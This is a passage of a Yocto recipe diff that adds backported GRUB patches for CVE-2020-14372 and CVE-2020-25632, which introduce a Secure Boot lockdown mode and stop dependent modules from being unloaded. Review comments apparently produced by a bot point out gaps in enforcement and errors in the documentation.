++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \
+diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi
+index ee389fd..635ec72 100644
+--- a/docs/grub-dev.texi
++++ b/docs/grub-dev.texi
+@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}.
+ * PFF2 Font File Format::
+ * Graphical Menu Software Design::
+ * Verifiers framework::
++* Lockdown framework::
+ * Copying This Manual:: Copying This Manual
+ * Index::
+ @end menu
+@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just
+ the context. If you return no error during any of @samp{init}, @samp{write} and
+ @samp{fini} then the file is considered as having succeded verification.
+
++@node Lockdown framework
++@chapter Lockdown framework
++
++The GRUB can be locked down, which is a restricted mode where some operations
++are not allowed. For instance, some commands cannot be used when the GRUB is
++locked down.
++
++The function
++@code{grub_lockdown()} is used to lockdown GRUB and the function
++@code{grub_is_lockdown()} function can be used to check whether lockdown is
++enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED}
++and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled.
++
++The following functions can be used to register the commands that can only be
++used when lockdown is disabled:
++
++@itemize
++
++@item @code{grub_cmd_lockdown()} registers command which should not run when the
++GRUB is in lockdown mode.
++
++@item @code{grub_cmd_lockdown()} registers extended command which should not run
++when the GRUB is in lockdown mode.
++
++@end itemize
++
+ @node Copying This Manual
+ @appendix Copying This Manual
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 8779507..d778bfb 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order.
+ * Using digital signatures:: Booting digitally signed code
+ * UEFI secure boot and shim:: Booting digitally signed PE files
+ * Measured Boot:: Measuring boot components
++* Lockdown:: Lockdown when booting on a secure setup
+ @end menu
+
+ @node Authentication and authorisation
+@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between
+
+ Measured boot is currently only supported on EFI platforms.
+
++@node Lockdown
++@section Lockdown when booting on a secure setup
++
++The GRUB can be locked down when booted on a secure boot environment, for example
++if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
++be restricted and some operations/commands cannot be executed.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 375c30d..3096241 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h
+ if COND_emu
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h
+@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES)
+ b=`basename $$pp .marker`; \
+ sed -n \
+ -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
++ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+ -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
++ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \
++ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
+ done) | sort -u > $@
+ platform_DATA += command.lst
+ CLEANFILES += command.lst
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index cff02f2..651ea2a 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -204,6 +204,7 @@ kernel = {
+ efi = term/efi/console.c;
+ efi = kern/acpi.c;
+ efi = kern/efi/acpi.c;
++ efi = kern/lockdown.c;
+ i386_coreboot = kern/i386/pc/acpi.c;
+ i386_multiboot = kern/i386/pc/acpi.c;
+ i386_coreboot = kern/acpi.c;
+diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c
+index 69574e2..90a5ca2 100644
+--- a/grub-core/commands/extcmd.c
++++ b/grub-core/commands/extcmd.c
+@@ -19,6 +19,7 @@
+
+ #include <grub/mm.h>
+ #include <grub/list.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/extcmd.h>
+ #include <grub/script_sh.h>
+@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func,
+ summary, description, parser, 1);
+ }
+
++static grub_err_t
++grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)),
++ int argc __attribute__ ((unused)),
++ char **argv __attribute__ ((unused)))
++{
++ return grub_error (GRUB_ERR_ACCESS_DENIED,
++ N_("%s: the command is not allowed when lockdown is enforced"),
++ ctxt->extcmd->cmd->name);
++}
++
++grub_extcmd_t
++grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func,
++ grub_command_flags_t flags, const char *summary,
++ const char *description,
++ const struct grub_arg_option *parser)
++{
++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++ func = grub_extcmd_lockdown;
++
++ return grub_register_extcmd (name, func, flags, summary, description, parser);
++}
++
+ void
+ grub_unregister_extcmd (grub_extcmd_t ext)
+ {
+diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c
+index acd7218..4aabcd4 100644
+--- a/grub-core/kern/command.c
++++ b/grub-core/kern/command.c
+@@ -17,6 +17,7 @@
+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
+ */
+
++#include <grub/lockdown.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+
+@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name,
+ return cmd;
+ }
+
++static grub_err_t
++grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)),
++ int argc __attribute__ ((unused)),
++ char **argv __attribute__ ((unused)))
++
++{
++ return grub_error (GRUB_ERR_ACCESS_DENIED,
++ N_("%s: the command is not allowed when lockdown is enforced"),
++ cmd->name);
++}
++
++grub_command_t
++grub_register_command_lockdown (const char *name,
++ grub_command_func_t func,
++ const char *summary,
++ const char *description)
++{
++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++ func = grub_cmd_lockdown;
++
++ return grub_register_command_prio (name, func, summary, description, 0);
++}
++
+ void
+ grub_unregister_command (grub_command_t cmd)
+ {
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+new file mode 100644
+index 0000000..1e56c0b
+--- /dev/null
++++ b/grub-core/kern/lockdown.c
+@@ -0,0 +1,80 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ *
++ */
++
++#include <grub/dl.h>
++#include <grub/file.h>
++#include <grub/lockdown.h>
++#include <grub/verify.h>
++
++static int lockdown = GRUB_LOCKDOWN_DISABLED;
++
++static grub_err_t
++lockdown_verifier_init (grub_file_t io __attribute__ ((unused)),
++ enum grub_file_type type,
++ void **context __attribute__ ((unused)),
++ enum grub_verify_flags *flags)
++{
++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++
++ switch (type & GRUB_FILE_TYPE_MASK)
++ {
++ case GRUB_FILE_TYPE_GRUB_MODULE:
++ case GRUB_FILE_TYPE_LINUX_KERNEL:
++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++ case GRUB_FILE_TYPE_XEN_HYPERVISOR:
++ case GRUB_FILE_TYPE_BSD_KERNEL:
++ case GRUB_FILE_TYPE_XNU_KERNEL:
++ case GRUB_FILE_TYPE_PLAN9_KERNEL:
++ case GRUB_FILE_TYPE_NTLDR:
++ case GRUB_FILE_TYPE_TRUECRYPT:
++ case GRUB_FILE_TYPE_FREEDOS:
++ case GRUB_FILE_TYPE_PXECHAINLOADER:
++ case GRUB_FILE_TYPE_PCCHAINLOADER:
++ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER:
++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++ case GRUB_FILE_TYPE_ACPI_TABLE:
++ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE:
++ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH;
++
++ /* Fall through. */
++
++ default:
++ return GRUB_ERR_NONE;
++ }
++}
++
++struct grub_file_verifier lockdown_verifier =
++ {
++ .name = "lockdown_verifier",
++ .init = lockdown_verifier_init,
++ };
++
++void
++grub_lockdown (void)
++{
++ lockdown = GRUB_LOCKDOWN_ENABLED;
++
++ grub_verifier_register (&lockdown_verifier);
++}
++
++int
++grub_is_lockdown (void)
++{
++ return lockdown;
++}
+diff --git a/include/grub/command.h b/include/grub/command.h
+index eee4e84..2a6f7f8 100644
+--- a/include/grub/command.h
++++ b/include/grub/command.h
+@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name,
+ const char *summary,
+ const char *description,
+ int prio);
++grub_command_t
++EXPORT_FUNC(grub_register_command_lockdown) (const char *name,
++ grub_command_func_t func,
++ const char *summary,
++ const char *description);
+ void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd);
+
+ static inline grub_command_t
+diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h
+index 19fe592..fe9248b 100644
+--- a/include/grub/extcmd.h
++++ b/include/grub/extcmd.h
+@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name,
+ const char *description,
+ const struct grub_arg_option *parser);
+
++grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name,
++ grub_extcmd_func_t func,
++ grub_command_flags_t flags,
++ const char *summary,
++ const char *description,
++ const struct grub_arg_option *parser);
++
+ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name,
+ grub_extcmd_func_t func,
+ grub_command_flags_t flags,
+diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h
+new file mode 100644
+index 0000000..40531fa
+--- /dev/null
++++ b/include/grub/lockdown.h
+@@ -0,0 +1,44 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_LOCKDOWN_H
++#define GRUB_LOCKDOWN_H 1
++
++#include <grub/symbol.h>
++
++#define GRUB_LOCKDOWN_DISABLED 0
++#define GRUB_LOCKDOWN_ENABLED 1
++
++#ifdef GRUB_MACHINE_EFI
++extern void
++EXPORT_FUNC (grub_lockdown) (void);
++extern int
++EXPORT_FUNC (grub_is_lockdown) (void);
++#else
++static inline void
++grub_lockdown (void)
++{
++}
++
++static inline int
++grub_is_lockdown (void)
++{
++ return GRUB_LOCKDOWN_DISABLED;
++}
++#endif
++#endif /* ! GRUB_LOCKDOWN_H */
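Review bot: `grub_register_command_lockdown ()` and `grub_register_extcmd_lockdown ()` test `grub_is_lockdown ()` only once, at registration time, so a command registered before `grub_lockdown ()` runs keeps its real handler afterwards. The restriction therefore depends on `grub_lockdown ()` being called before any module init, and nothing in these files states that. I would add above both functions a comment such as `/* Lockdown is sampled at registration: grub_lockdown () must run before any module registers commands. */`. Separately, the new grub-dev.texi chapter names `grub_cmd_lockdown()` in both `@item` entries, but that is the static denial handler in command.c; the registration functions are the two named above.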
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
new file mode 100644
index 0000000000..93fdd2cb1a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
@@ -0,0 +1,57 @@
+From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 2 Feb 2021 19:59:48 +0100
+Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down
+
+It may be useful for scripts to determine whether the GRUB is locked
+down or not. Add the lockdown variable which is set to "y" when the GRUB
+is locked down.
+
+Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/kern/lockdown.c | 4 ++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index d778bfb..5e6cace 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl
+ if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
+ be restricted and some operations/commands cannot be executed.
+
++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down.
++Otherwise it does not exit.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+index 1e56c0b..0bc70fd 100644
+--- a/grub-core/kern/lockdown.c
++++ b/grub-core/kern/lockdown.c
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/dl.h>
++#include <grub/env.h>
+ #include <grub/file.h>
+ #include <grub/lockdown.h>
+ #include <grub/verify.h>
+@@ -71,6 +72,9 @@ grub_lockdown (void)
+ lockdown = GRUB_LOCKDOWN_ENABLED;
+
+ grub_verifier_register (&lockdown_verifier);
++
++ grub_env_set ("lockdown", "y");
++ grub_env_export ("lockdown");
+ }
+
+ int
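Review bot: The `lockdown` variable added in `grub_lockdown ()` is created with plain `grub_env_set ()` / `grub_env_export ()`, and nothing in the hunk makes it read-only, so a script or console user can presumably overwrite or unset it. It should be documented as informational, with `grub_is_lockdown ()` the only value policy code trusts, e.g. `/* Informational for scripts only; enforcement must use grub_is_lockdown (). */` above the `grub_env_set` call. The result of `grub_env_set ()` is also dropped, so a failure there would leave the variable silently unset. The added grub.texi sentence reads "does not exit" where "does not exist" is meant. `grub_lockdown ()` starts outside the hunk.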
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
new file mode 100644
index 0000000000..ac509b63c7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
@@ -0,0 +1,52 @@
+From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:29 +0200
+Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled
+
+If the UEFI Secure Boot is enabled then the GRUB must be locked down
+to prevent executing code that can potentially be used to subvert its
+verification mechanisms.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/init.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c
+index 3dfdf2d..db84d82 100644
+--- a/grub-core/kern/efi/init.c
++++ b/grub-core/kern/efi/init.c
+@@ -20,6 +20,7 @@
+ #include <grub/efi/efi.h>
+ #include <grub/efi/console.h>
+ #include <grub/efi/disk.h>
++#include <grub/lockdown.h>
+ #include <grub/term.h>
+ #include <grub/misc.h>
+ #include <grub/env.h>
+@@ -39,6 +40,20 @@ grub_efi_init (void)
+ /* Initialize the memory management system. */
+ grub_efi_mm_init ();
+
++ /*
++ * Lockdown the GRUB and register the shim_lock verifier
++ * if the UEFI Secure Boot is enabled.
++ */
++ if (grub_efi_secure_boot ())
++ {
++ grub_lockdown ();
++ /* NOTE: Our version does not have the shim_lock_verifier,
++ * need to update below if added */
++#if 0
++ grub_shim_lock_verifier_setup ();
++#endif
++ }
++
+ efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer,
+ 0, 0, 0, NULL);
+
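Review bot: With `grub_shim_lock_verifier_setup ()` compiled out by `#if 0` in `grub_efi_init ()`, the lockdown verifier is the only verifier this code registers when Secure Boot is on. The description of the lockdown patch says that files flagged `GRUB_VERIFY_FLAGS_DEFER_AUTH` (kernels, GRUB modules, ACPI tables, device trees) pass only if another registered verifier returns success. On this backport such loads would therefore presumably be rejected unless another verifier, for instance a PGP one, is also present. The NOTE comment should spell that out, for example `/* Without shim_lock, DEFER_AUTH files need another verifier (e.g. pgp) or they are rejected. */`, so integrators know what a Secure Boot image has to ship. `grub_efi_init ()` continues outside the hunk.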
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
new file mode 100644
index 0000000000..12ec4e1c17
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
@@ -0,0 +1,158 @@
+From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:33 +0200
+Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled
+ modules list
+
+Now the GRUB can check if it has been locked down and this can be used to
+prevent executing commands that can be utilized to circumvent the UEFI
+Secure Boot mechanisms. So, instead of hardcoding a list of modules that
+have to be disabled, prevent the usage of commands that can be dangerous.
+
+This not only allows the commands to be disabled on other platforms, but
+also properly separate the concerns. Since the shim_lock verifier logic
+should be only about preventing to run untrusted binaries and not about
+defining these kind of policies.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 10 ++++++++++
+ grub-core/commands/i386/wrmsr.c | 5 +++--
+ grub-core/commands/iorw.c | 19 ++++++++++---------
+ grub-core/commands/memrw.c | 19 ++++++++++---------
+ 4 files changed, 33 insertions(+), 20 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 5e6cace..0786427 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command.
+ Also, if you specify a reserved or unimplemented MSR address, it will
+ cause a general protection exception (which is not currently being handled)
+ and the system will reboot.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node xen_hypervisor
+@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the
+ shim_lock module. And itself it is a persistent module which means that
+ it cannot be unloaded if it was loaded into the memory.
+
++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables,
++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands
++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw}
++and @command{memrw} will not be available when the UEFI secure boot is enabled.
++This is done for security reasons and are enforced by the GRUB Lockdown mechanism
++(@pxref{Lockdown}).
++
+ @node Measured Boot
+ @section Measuring boot components
+
+diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c
+index 9c5e510..56a29c2 100644
+--- a/grub-core/commands/i386/wrmsr.c
++++ b/grub-core/commands/i386/wrmsr.c
+@@ -24,6 +24,7 @@
+ #include <grub/env.h>
+ #include <grub/command.h>
+ #include <grub/extcmd.h>
++#include <grub/lockdown.h>
+ #include <grub/i18n.h>
+ #include <grub/i386/cpuid.h>
+ #include <grub/i386/wrmsr.h>
+@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char
+
+ GRUB_MOD_INIT(wrmsr)
+ {
+- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
+- N_("Write a value to a CPU model specific register."));
++ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
++ N_("Write a value to a CPU model specific register."));
+ }
+
+ GRUB_MOD_FINI(wrmsr)
+diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c
+index a0c164e..584baec 100644
+--- a/grub-core/commands/iorw.c
++++ b/grub-core/commands/iorw.c
+@@ -23,6 +23,7 @@
+ #include <grub/env.h>
+ #include <grub/cpu/io.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw)
+ N_("PORT"), N_("Read 32-bit value from PORT."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("outb", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 8-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outb", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 8-bit VALUE to PORT."));
+ cmd_write_word =
+- grub_register_command ("outw", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 16-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outw", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 16-bit VALUE to PORT."));
+ cmd_write_dword =
+- grub_register_command ("outl", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outl", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to PORT."));
+ }
+
+ GRUB_MOD_FINI(memrw)
+diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c
+index 98769ea..d401a6d 100644
+--- a/grub-core/commands/memrw.c
++++ b/grub-core/commands/memrw.c
+@@ -22,6 +22,7 @@
+ #include <grub/extcmd.h>
+ #include <grub/env.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw)
+ N_("ADDR"), N_("Read 32-bit value from ADDR."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("write_byte", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 8-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_byte", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 8-bit VALUE to ADDR."));
+ cmd_write_word =
+- grub_register_command ("write_word", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 16-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_word", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 16-bit VALUE to ADDR."));
+ cmd_write_dword =
+- grub_register_command ("write_dword", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_dword", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to ADDR."));
+ }
+
+ GRUB_MOD_FINI(memrw)
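Review bot: Only the write commands in iorw.c and memrw.c are moved to `grub_register_command_lockdown ()`; the read registrations visible as context (`N_("Read 32-bit value from PORT.")`, `N_("Read 32-bit value from ADDR.")`) are left unchanged. The added grub.texi paragraph says `iorw` and `memrw` "will not be available" under UEFI Secure Boot, which overstates the change if the read commands stay registered normally. Either narrow the documentation to the write commands, or register the read commands through `grub_register_extcmd_lockdown ()` if reading arbitrary memory and ports is also meant to be blocked in lockdown. Both `GRUB_MOD_INIT` bodies start outside the hunks, so the read registrations are only partly visible.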
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25632.patch b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
new file mode 100644
index 0000000000..0b37c72f0f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
@@ -0,0 +1,90 @@
+From 7630ec5397fe418276b360f9011934b8c034936c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 29 Sep 2020 14:08:55 +0200
+Subject: [PATCH] dl: Only allow unloading modules that are not dependencies
+
+When a module is attempted to be removed its reference counter is always
+decremented. This means that repeated rmmod invocations will cause the
+module to be unloaded even if another module depends on it.
+
+This may lead to a use-after-free scenario allowing an attacker to execute
+arbitrary code and by-pass the UEFI Secure Boot protection.
+
+While being there, add the extern keyword to some function declarations in
+that header file.
+
+Fixes: CVE-2020-25632
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7630ec5397fe418276b360f9011934b8c034936c]
+CVE: CVE-2020-25632
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/minicmd.c | 7 +++++--
+ grub-core/kern/dl.c | 9 +++++++++
+ include/grub/dl.h | 8 +++++---
+ 3 files changed, 19 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/commands/minicmd.c b/grub-core/commands/minicmd.c
+index 6bbce3128..fa498931e 100644
+--- a/grub-core/commands/minicmd.c
++++ b/grub-core/commands/minicmd.c
+@@ -140,8 +140,11 @@ grub_mini_cmd_rmmod (struct grub_command *cmd __attribute__ ((unused)),
+ if (grub_dl_is_persistent (mod))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload persistent module");
+
+- if (grub_dl_unref (mod) <= 0)
+- grub_dl_unload (mod);
++ if (grub_dl_ref_count (mod) > 1)
++ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload referenced module");
++
++ grub_dl_unref (mod);
++ grub_dl_unload (mod);
+
+ return 0;
+ }
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..48f8a7907 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -549,6 +549,15 @@ grub_dl_unref (grub_dl_t mod)
+ return --mod->ref_count;
+ }
+
++int
++grub_dl_ref_count (grub_dl_t mod)
++{
++ if (mod == NULL)
++ return 0;
++
++ return mod->ref_count;
++}
++
+ static void
+ grub_dl_flush_cache (grub_dl_t mod)
+ {
+diff --git a/include/grub/dl.h b/include/grub/dl.h
+index f03c03561..b3753c9ca 100644
+--- a/include/grub/dl.h
++++ b/include/grub/dl.h
+@@ -203,9 +203,11 @@ grub_dl_t EXPORT_FUNC(grub_dl_load) (const char *name);
+ grub_dl_t grub_dl_load_core (void *addr, grub_size_t size);
+ grub_dl_t EXPORT_FUNC(grub_dl_load_core_noinit) (void *addr, grub_size_t size);
+ int EXPORT_FUNC(grub_dl_unload) (grub_dl_t mod);
+-void grub_dl_unload_unneeded (void);
+-int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
+-int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern void grub_dl_unload_unneeded (void);
++extern int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
